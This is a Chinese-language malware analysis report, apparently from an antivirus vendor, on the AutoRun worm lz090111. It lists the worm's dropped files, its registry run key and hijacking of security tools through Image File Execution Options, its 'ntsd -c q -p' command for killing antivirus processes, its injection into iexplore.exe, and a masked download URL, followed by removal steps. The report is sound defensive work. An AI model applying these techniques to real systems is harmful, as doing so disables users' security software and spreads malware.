Worm/Win32.AutoRun.xgn [Net]分析

一、 病毒标签：
病毒名称： Worm/Win32.AutoRun.xgn[Net]
病毒类型： 蠕虫
文件 MD5： E1DE37D0FEDD76EB49DACFF0F0E400D2
公开范围： 完全公开
危害等级： 4
文件长度： 58,286 字节
感染系统： Windows98以上版本
开发工具： Borland Delphi 6.0-7.0[Overlay]
加壳类型： Upack 0.3.9 beta2s -> Dwing

二、 病毒描述：
该病毒为蠕虫类病毒，病毒运行后，动态获取API，查找类名为“CabinetWClass”的窗体，如找到该窗口则调用API函数枚举子窗体并发送“WM_SETTEXT”、“WM_KEYDOWN”消息，获取进程句柄修改访问权限，遍历进程查找AVP.exe，找到该进程后，将系统时间设置为当前时间减3天的时间即向前3天时间，延迟一段时间再将时间还原，遍历进程查找安全软件进程、如发现RUNIEP.EXE、KRegEx.exe、KVXP.kxp、360tray.exe、avp.exe进程就调用ntsd命令强行关闭，衍生病毒文件lz090111.exe、lz32dla.dll到%System%目录下，修改注册表项使设置显示隐藏文件失效，添加注册表启动项，并在%Documents and Settings%\All Users\目录下创建配置文件lzdf16.ini存放衍生的病毒路径，开启iexploe.exe进程连接网络，病毒会不定期下载病毒文件更新自身。
lz32dla.dll样本行为：开启iexplore.exe进程创建一个线程、连接网络记录安装信息，在每个盘符下生成anto.exe病毒文件，达到双击盘符自动运行病毒目的，添加大量映像劫持、使部分安全软件不能正常开启，监视windows 任务管理器窗口，如发现则调用API函数发送关闭消息

三、 行为分析：
本地行为:
1、动态获取API，查找类名为“CabinetWClass”的窗体，如找到该窗口则调用API函数枚举子窗体并发送“WM_SETTEXT”、“WM_KEYDOWN”消息，获取进程句柄修改访问权限，遍历进程查找AVP.exe，找到该进程后，将系统时间设置为当前时间减3天的时间即向前3天时间，延迟一段时间再将时间还原

2、文件运行后会释放以下文件
%Windir%\system\lz090111.exe
%Windir%\system\lz32dla.dll

3、修改注册表、添加注册表启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\dlnblz
值: 字符串: "C:\WINDOWS\system\lz090111.exe"
描述：添加注册表启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft Windows NT\CurrentVersion\Image File Execution Options\被映像劫持的文件名称\Debugger
值: 字符串: "C:\WINDOWS\system32\svchost.exe"
agentsvr.exe、appsvc32.exe、auto.exe、autoruns.exe、avgrssvc.exe、avmonitor.exe、ccsvchst.exe、cross.exe、enc98.exe、filedsty.exe、ftcleanershell.exe、guangd.exe、hijackthis.exe、icesword.exe、iparmo.exe、ispwdsvc.exe、kabaload.exe、kascrscn.scr、kav32.exe、kavdx.exe、kavpfw.exe、kavsetup.exe、kavstart.exe、kislnchr.exe、kmailmon.exe、kmfilter.exe、kpfw32.exe、kregex.exe、ksloader.exe、kvcenter.kxp、kvdetect.exe、kvmonxp_1.kxp、kvol.exe、kvolself.exe、kvreport.kxp、kvstub.kxp、kvupload.exe、kvwsc.exe、kvxp.kxp、kwatch.exe、kwatch9x.exe、magicset.exe、mcconsol.exe、mmqczj.exe、mmsk.exe、navsetup.exe、nod32krn.exe、nod32kui.exe、pfwliveupdate.exe、qhset.exe、ravmon.exe、regclean.exe、rfwcfg.exe、rfwproxy.exe、rfwsrv.exe、rsaupd.exe、runiep.exe、safelive.exe、scan32.exe、sreng.exe、symlcsvc.exe、systom.exe、trojandetector.exe、trojanwall.exe、txomou.exe、ua80.exe、uihost.exe、umxagent.exe、umxattachment.exe、umxcfg.exe、umxfwhlp.exe、umxpol.exe、uplive.exe、wopticlean.exe、xp.exe、qqdoctor.exe、drrtp.exe、boxmod.exe、debugger、360rpt.exe、adam.exe

4、获取进程句柄修改访问权限，如发现RUNIEP.EXE、KRegEx.exe、KVXP.kxp、360tray.exe、rstray.exe进程就调用ntsd命令: ntsd -c q -p强行关闭, 隐藏开启一个iexplore.exe进程，枚举窗口查找该窗体类名“IEFrame”，修改进程权限、申请内存空间、将病毒数据写入iexplore.exe进程中创建一个远程线程，连接网络下载病毒文件，病毒运行完毕后、调用DOS命令删除自身，监视windows 任务管理器如发现则向该窗口发送关闭消息,连接网络下载病毒文件、记录病毒当前更新版本号、以便及时更新病毒文件

网络行为:
协议：TCP
端口：80
连接地址：www.38***.cn
描述：连接地址记录安装信息，并下载恶意病毒文件
GET/mylist.asp?ver=090111&tgid=4&address=00-0C-29-8C-9D-B6

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
   %Windir% 　　　　　 　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　 　　　　　　　   逻辑驱动器根目录
　　　　%ProgramFiles%　 　 　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　 当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　   当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　 　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　 系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是%WINDOWS%\System
　　　　windowsXP中默认的安装路径是%system32%　　　

四、 清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
（1）使用ATOOL管理工具，“进程管理“结束iexplore.exe进程
（2） 强行删除病毒下载的大量病毒文件
%Windir%\system\lz090111.exe
%Windir%\system\lz32dla.dll
（3）删除病毒添加的注册表启动项及劫持的安全软件项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\dlnblz"
删除RUN键下的dlnblz键
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft Windows NT\CurrentVersion\Image File Execution Options\被映像劫持的文件名称
删除Image File Execution Options键下所有键值